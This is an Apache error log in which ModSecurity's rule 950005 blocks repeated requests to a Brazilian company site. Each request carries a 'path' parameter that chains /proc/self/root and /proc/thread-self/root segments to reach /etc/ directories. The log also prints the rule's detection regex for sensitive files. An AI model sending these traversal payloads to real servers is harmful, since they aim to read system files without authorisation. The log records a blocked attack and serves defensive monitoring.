[Wed Mar 18 09:51:12.670986 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:40942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfwOoXxyEfFpUF8f9k2gAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:14.294939 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:40948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfweyqAr6etmhZHNq15QAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:15.815348 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:40954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfw-oXxyEfFpUF8f9k3wAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:17.117550 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:40964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfxQkwaGbbGflqUZAGnAAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:18.442949 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:40974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfxtY0UrI5A3LftIybqAAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:19.806397 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:48454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfx_u8EFLIOrSqIpv7sAAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:21.131593 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:48470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfyfu8EFLIOrSqIpv7sgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:23.558956 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:48472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfy-yqAr6etmhZHNq16QAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:24.890125 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:48474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfzNa6ubjKNq_cu4aPyAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:26.195298 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:48482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfzuoXxyEfFpUF8f9k4QAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:36.740076 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:48492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqf2Pu8EFLIOrSqIpv7yQAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:51:40.915620 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:58920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqf3Na6ubjKNq_cu4aP2wAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:43.335137 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:60922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqf30zinOy1jxa1j4cK3AAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:49.144406 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:60938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqf5SmAPhZkrhU8w4ljuQAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:49.728828 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:60938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqf5SmAPhZkrhU8w4ljuwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:51:54.967430 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:50508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqf6imAPhZkrhU8w4ljwgAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:52:07.168463 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:50514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqf9wkwaGbbGflqUZAG8AAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:52:21.287336 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:35896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgBQkwaGbbGflqUZAG_gAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:52:31.960920 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:34516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgD8df6f5d65gmYZTLsgAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:52:37.227939 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:56530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgFew_le52K8_3pV3WkgAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:52:37.715875 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.241.31:36052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqgFSmAPhZkrhU8w4lj5gAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
